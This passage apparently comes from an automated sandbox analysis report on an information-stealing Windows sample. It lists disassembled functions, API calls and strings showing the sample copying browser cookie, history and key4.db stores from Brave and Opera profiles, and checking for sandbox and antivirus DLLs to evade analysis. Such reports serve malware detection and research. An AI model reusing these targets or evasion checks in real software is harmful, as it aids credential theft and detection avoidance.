                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Brave,?,?,?,00643A71,?,?,00643A71,?,?,?,?,00643A71,?,?), ref: 0040BCC3
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040CC74
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: StrCmpCA.SHLWAPI(00000000,00632B48), ref: 0040C2AA
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C3AA
                                                                                                                                                                                                                                                    • Part of subcall function 0040B942: Sleep.KERNEL32(000003E8,?), ref: 0040C3CD
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalFree.KERNEL32(EC8350EC), ref: 0040AF18
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CB1C
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040CB37
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040CB4C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$lstrcat$Copy$lstrcpy$CloseCreateFindSleep$DeleteHandleLocalProcessmemset$AllocExistsFirstFreeNextObjectOpenPathReadSingleSizeTerminateThreadWaitlstrlen
                                                                                                                                                                                                                                                  • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$H+c$Opera GX$_cookies.db$_history.db$_webdata.db$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 94806381-1959957562
                                                                                                                                                                                                                                                  • Opcode ID: 127a16f1cfdc933f104487545c4dcec3ebf9936fac967d3ae1bbf9b33bcd2fa0
                                                                                                                                                                                                                                                  • Instruction ID: 174e56ac039bf92636f85ecbebfaea88a4299e227d1b3268452c05c8328876e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 127a16f1cfdc933f104487545c4dcec3ebf9936fac967d3ae1bbf9b33bcd2fa0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9C2E1B5D006599BCB11EF61CC81AEEBBB6FF55308F00411EE41567292DF38AB85CB98
                                                                                                                                                                                                                                                  Function 0040DE0C Relevance: 30.4, APIs: 5, Strings: 12, Instructions: 619fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1475 40de0c-40de42 call 41370e call 413806 1480 40de44-40de55 1475->1480 1481 40de5c-40dea7 call 413860 call 4137c0 call 413770 * 2 call 41398e FindFirstFileA 1475->1481 1480->1481 1492 40e672-40e6c7 call 413770 * 9 1481->1492 1493 40dead-40deca 1481->1493 1495 40ded0-40ded7 1493->1495 1497 40dee9-40defe 1495->1497 1498 40ded9-40dee2 1495->1498 1502 40e660-40e66c FindNextFileA 1497->1502 1503 40df04-40df0b 1497->1503 1498->1497 1502->1492 1502->1495 1505 40df24-40df39 1503->1505 1506 40df0d-40df1d 1503->1506 1505->1502 1511 40df3f-40df9e call 41370e * 7 call 41398e 1505->1511 1506->1505 1538 40dfa0-40dfb3 1511->1538 1539 40dfba-40dfc4 StrCmpCA 1511->1539 1538->1539 1540 40e042-40e065 call 413778 call 413806 1539->1540 1541 40dfc6-40dfd5 call 41398e 1539->1541 1551 40e077-40e35e call 413860 call 413806 call 413860 * 3 call 413806 call 4137c0 call 413770 * 7 call 413860 * 2 call 4137c0 call 413770 * 2 call 413806 call 413860 call 413806 call 413860 * 3 call 413806 call 4137c0 call 413770 * 7 call 413860 * 2 call 4137c0 call 413770 * 2 call 413806 call 413860 call 413806 call 413860 * 4 call 413806 call 413860 call 4137c0 call 413770 * 9 call 413860 * 2 call 4137c0 call 413770 * 2 1540->1551 1552 40e067-40e070 1540->1552 1547 40dff5-40dfff StrCmpCA 1541->1547 1548 40dfd7-40dfee 1541->1548 1547->1540 1550 40e001-40e010 call 41398e 1547->1550 1548->1547 1556 40e012-40e033 1550->1556 1557 40e03a-40e040 StrCmpCA 1550->1557 1683 40e364-40e380 call 413740 call 414ab3 1551->1683 1684 40e42a-40e42e 1551->1684 1552->1551 1556->1557 1557->1540 1683->1684 1703 40e386-40e428 call 413740 * 8 call 40d820 1683->1703 1685 40e434-40e451 call 413740 call 414ab3 1684->1685 1686 40e4fb-40e4ff 1684->1686 1685->1686 1704 40e457-40e4f9 call 413740 * 8 call 40d820 1685->1704 1689 40e505-40e522 call 413740 call 414ab3 1686->1689 1690 40e5cf-40e65a call 41395a * 7 call 413770 * 7 1686->1690 1689->1690 1710 40e528-40e5cd call 413740 * 8 call 40d820 1689->1710 1690->1502 1703->1684 1704->1686 1710->1690
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042EEFC), ref: 0040DE9F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC,0042EEFC), ref: 0040DFC0
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040DFFB
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040E040
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00414AB3: GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040E664
                                                                                                                                                                                                                                                    • Part of subcall function 0040D820: FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                                                                                                                                                                                                                  • String ID: Opera$Opera Crypto$Opera GX$\*.*$q:d$q:d$q:d$q:d$q:d$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 3824151033-3007903608
                                                                                                                                                                                                                                                  • Opcode ID: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
                                                                                                                                                                                                                                                  • Instruction ID: 85de566a111d5f1e8b18406dd00569acccaa8dec1bf15e5a141765a1f0173e6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da345ea911fdbb0c6dedb88d97770686dba92db61566b6d7d4b8b57ada552932
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0432C5B59001189ACF05FF61CC91AEE7B79AF55309F00805EF81567192DF38ABC9CBA8
                                                                                                                                                                                                                                                  Function 00401325 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2035 401325-40133a GetPEB 2036 40133c-401340 2035->2036 2037 401342-40134e lstrcmpiW 2036->2037 2038 401355-401361 GetPEB 2036->2038 2037->2036 2039 401350 2037->2039 2040 401363-401367 2038->2040 2041 401454-401457 2039->2041 2042 401369-401375 lstrcmpiW 2040->2042 2043 40137c-401388 GetPEB 2040->2043 2042->2040 2044 401377 2042->2044 2045 40138a-40138e 2043->2045 2044->2041 2046 401390-40139c lstrcmpiW 2045->2046 2047 4013a3-4013af GetPEB 2045->2047 2046->2045 2049 40139e 2046->2049 2048 4013b1-4013b5 2047->2048 2050 4013b7-4013c3 lstrcmpiW 2048->2050 2051 4013ca-4013d6 GetPEB 2048->2051 2049->2041 2050->2048 2052 4013c5 2050->2052 2053 4013d8-4013dc 2051->2053 2052->2041 2054 4013ee-4013fa GetPEB 2053->2054 2055 4013de-4013ea lstrcmpiW 2053->2055 2057 4013fc-401400 2054->2057 2055->2053 2056 4013ec 2055->2056 2056->2041 2058 401412-40141e call 4012ed 2057->2058 2059 401402-40140e lstrcmpiW 2057->2059 2058->2041 2063 401420-40142c call 4012ed 2058->2063 2059->2057 2060 401410 2059->2060 2060->2041 2063->2041 2066 40142e-40143a call 4012ed 2063->2066 2066->2041 2069 40143c-401448 call 4012ed 2066->2069 2069->2041 2072 40144a-40144f call 4012ed 2069->2072 2072->2041
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghookx.dll), ref: 0040134A
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,avghooka.dll), ref: 00401371
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,snxhk.dll), ref: 00401398
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,sbiedll.dll), ref: 004013BF
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,api_log.dll), ref: 004013E6
                                                                                                                                                                                                                                                    • Part of subcall function 004012ED: lstrcmpiW.KERNEL32(?,?), ref: 00401313
                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,dir_watch.dll), ref: 0040140A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                  • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                  • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                  • Opcode ID: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction ID: 883fd4d78f60abfb3cb12b7bb653628bb47a760653f6edd6bf7d68e1fda7e1b2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3531AD323013909BDB219B4AC9C0B517366AF44B647AA0073D902BB7B7E2B99C41CA1D
                                                                                                                                                                                                                                                  Function 0040CCF2 Relevance: 23.5, APIs: 9, Strings: 4, Instructions: 771fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2074 40ccf2-40cd29 call 41370e call 413806 2079 40cd42-40cd8b call 413860 call 4137c0 call 413770 * 2 call 41398e FindFirstFileA 2074->2079 2080 40cd2b-40cd3b 2074->2080 2091 40cd91-40cdbc call 41370e call 413806 2079->2091 2092 40d7ce-40d81c call 413770 * 8 2079->2092 2080->2079 2101 40cddc-40ce45 call 413860 call 4137c0 call 413770 * 2 call 41370e call 413860 call 413806 2091->2101 2102 40cdbe-40cdd5 2091->2102 2129 40ce57-40cef2 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 2101->2129 2130 40ce47-40ce50 2101->2130 2102->2101 2157 40d008-40d026 2129->2157 2158 40cef8-40cf08 2129->2158 2130->2129 2161 40d029-40d030 2157->2161 2159 40cf1a-40cf53 call 413860 call 413806 2158->2159 2160 40cf0a-40cf13 2158->2160 2174 40cf73-40d003 call 413860 call 413740 * 4 call 41797d call 413770 * 3 2159->2174 2175 40cf55-40cf6c 2159->2175 2160->2159 2163 40d042-40d051 2161->2163 2164 40d032-40d03b 2161->2164 2169 40d057-40d05e 2163->2169 2170 40d79a-40d7ac FindNextFileA 2163->2170 2164->2163 2171 40d060-40d070 2169->2171 2172 40d077-40d086 2169->2172 2170->2161 2173 40d7b2-40d7c9 FindClose call 413770 * 2 2170->2173 2171->2172 2172->2170 2181 40d08c-40d0ae call 41370e call 413806 2172->2181 2173->2092 2174->2157 2175->2174 2192 40d0c0-40d10f call 413860 * 2 call 4137c0 call 413770 * 3 StrCmpCA 2181->2192 2193 40d0b0-40d0b9 2181->2193 2216 40d275-40d27b 2192->2216 2217 40d115-40d124 StrCmpCA 2192->2217 2193->2192 2218 40d281-40d2b9 call 41370e call 413860 call 413806 2216->2218 2219 40d6eb-40d6f2 2216->2219 2220 40d12a-40d139 StrCmpCA 2217->2220 2221 40d48c-40d492 2217->2221 2260 40d2cb-40d365 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 2218->2260 2261 40d2bb-40d2c4 2218->2261 2226 40d790-40d795 call 413770 2219->2226 2227 40d6f8-40d783 call 413740 * 2 call 41370e call 413740 * 4 call 40ccf2 2219->2227 2224 40d5a0-40d5c8 call 413740 call 40ae6d 2220->2224 2225 40d13f-40d14e StrCmpCA 2220->2225 2221->2219 2222 40d498-40d4c0 call 413740 call 40ae6d 2221->2222 2249 40d6e5 2222->2249 2252 40d4c6-40d4d6 2222->2252 2224->2249 2250 40d5ce-40d5de 2224->2250 2225->2219 2231 40d154-40d15b 2225->2231 2226->2170 2316 40d788-40d78a 2227->2316 2231->2219 2237 40d161-40d180 call 413740 call 40ae6d 2231->2237 2262 40d185-40d189 2237->2262 2249->2219 2255 40d5f0-40d623 call 413860 call 413806 2250->2255 2256 40d5e0-40d5e9 2250->2256 2258 40d4e8-40d51b call 413860 call 413806 2252->2258 2259 40d4d8-40d4e1 2252->2259 2286 40d625-40d646 2255->2286 2287 40d64d-40d6b0 call 413860 call 413740 * 4 2255->2287 2256->2255 2289 40d532-40d59b call 413860 call 413740 * 4 2258->2289 2290 40d51d-40d52b 2258->2290 2259->2258 2358 40d36a-40d36e 2260->2358 2261->2260 2262->2249 2263 40d18f-40d19f 2262->2263 2268 40d1b1-40d1e4 call 413860 call 413806 2263->2268 2269 40d1a1-40d1aa 2263->2269 2298 40d1e6-40d200 2268->2298 2299 40d207-40d270 call 413860 call 413740 * 4 2268->2299 2269->2268 2286->2287 2338 40d6b6-40d6de call 41797d call 413770 * 2 2287->2338 2289->2338 2290->2289 2298->2299 2299->2338 2316->2226 2354 40d6e0 call 413770 2338->2354 2354->2249 2359 40d484-40d487 2358->2359 2360 40d374-40d384 2358->2360 2359->2354 2361 40d396-40d3cc call 413860 call 413806 2360->2361 2362 40d386-40d38f 2360->2362 2367 40d3ce-40d3e8 2361->2367 2368 40d3ef-40d47f call 413860 call 413740 * 4 call 41797d call 413770 * 3 2361->2368 2362->2361 2367->2368 2368->2359
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,00643AFF,?,?,0042EEFC), ref: 0040CD86
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CEC9
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,00643A71,?,?,0042EEFC), ref: 0040D107
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D11C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D131
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040D146
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 0040D7A4
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040D7B5
                                                                                                                                                                                                                                                    • Part of subcall function 0040CCF2: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D342
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$lstrcpy$Find$CloseCopyCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrlen
                                                                                                                                                                                                                                                  • String ID: \key4.db$_cookies.db$_history.db$_key4.db
                                                                                                                                                                                                                                                  • API String ID: 2673225304-3347733256
                                                                                                                                                                                                                                                  • Opcode ID: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
                                                                                                                                                                                                                                                  • Instruction ID: 303406ac38d3177ba7cc7e5ed1d6b9532b3c71293ad990f1a43eb8195b1ed205
